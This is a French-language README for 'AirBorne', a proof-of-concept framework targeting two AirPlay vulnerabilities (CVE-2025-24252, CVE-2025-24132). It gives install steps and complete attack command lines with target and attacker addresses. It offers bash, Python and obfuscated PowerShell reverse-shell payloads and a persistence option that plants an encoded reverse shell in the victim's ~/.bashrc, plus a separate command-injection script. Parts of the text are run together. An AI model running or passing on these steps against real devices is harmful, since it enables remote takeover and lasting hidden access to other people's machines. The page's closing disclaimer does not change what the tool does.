
poc for CVE-2025-24252 & CVE-2025-24132
Framework PoC complet pour CVE-2025-24252 & CVE-2025-24132
Par ekomsSavior |
AirBorne est un framework de preuve de concept (PoC) combiné ciblant deux vulnérabilités graves dans le service AirPlay d'Apple. Il comprend un déclencheur de crash complet et un exploit de shell inversé fonctionnel avec persistance optionnelle, écouteur et plusieurs formats de payload — le tout dans un seul script.
Vous cherchez la version originale ?
L'édition héritée est toujours disponible dans la branchelegacyde ce dépôt.
Pour la consulter :
git checkout legacy
.bashrc (Linux)git clone https://github.com/ekomsSavior/AirBorne-PoC.git
cd AirBorne-PoC
sudo apt update
sudo apt install -y python3-scapy netcat
Le script unique airborne.py inclut les deux PoCs et toute la logique :
--exploit--payload--persistentsudo python3 airborne.py --exploit 24252 --interface wlan0
Nécessite une interface en mode moniteur.
Lancer l'exploit complet avec le shell bash par défaut :
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99
Choisir plutôt le shell Python :
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python
Activer la persistance réelle sur les cibles Linux :
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent
Injection de commande shell uniquement
sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"
| Payload | Description |
|---|---|
bash | Shell inversé bash par défaut sur TCP |
python | Shell inversé basé sur Python utilisant socket et pty |
Lors de l'utilisation de --persistent, le script ajoutera le payload de shell inversé encodé au fichier suivant de la cible :
~/.bashrc
Cela garantit qu'un shell vous est retourné à chaque connexion de l'utilisateur ou ouverture d'un terminal.
base64 et délivrés après le débordement de tamponCe projet est destiné uniquement à la recherche éducative, éthique et autorisée.
L'exploitation non autorisée de systèmes est illégale et contraire à l'éthique.
powershell |
| Payload RCE Windows PowerShell complet (obfusqué) |